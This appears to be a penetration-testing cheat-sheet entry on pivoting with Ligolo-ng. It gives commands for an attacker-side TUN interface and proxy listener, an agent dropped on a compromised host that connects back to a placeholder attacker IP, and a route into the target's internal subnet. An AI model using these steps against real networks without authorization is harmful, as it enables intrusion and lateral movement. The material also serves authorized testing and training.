Ligolo-ng - Grimoire

TUN-based tunneling tool: routes traffic through a compromised host at the kernel level, so tools work natively without proxychains.

Create TUN interface (attacker, one-time setup)

Run once on your attack box to create the kernel tunnel interface.

sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up

Start the proxy listener (attacker)

sudo proxy -selfcert -laddr 0.0.0.0:11601

Deploy and run the agent (target)

Drop the agent binary on the compromised host and connect back to your proxy.

# Linux
./agent -connect <attacker_IP>:11601 -ignore-cert

# Windows
agent.exe -connect <attacker_IP>:11601 -ignore-cert

Select session and start tunnel (Ligolo console)

In the interactive Ligolo shell, select the connected session then start routing.

session
start

Add route for the internal subnet (attacker)

Route the target’s internal network through the ligolo interface so your tools reach it directly.

sudo ip route add <internal_subnet>/24 dev ligolo

⌘I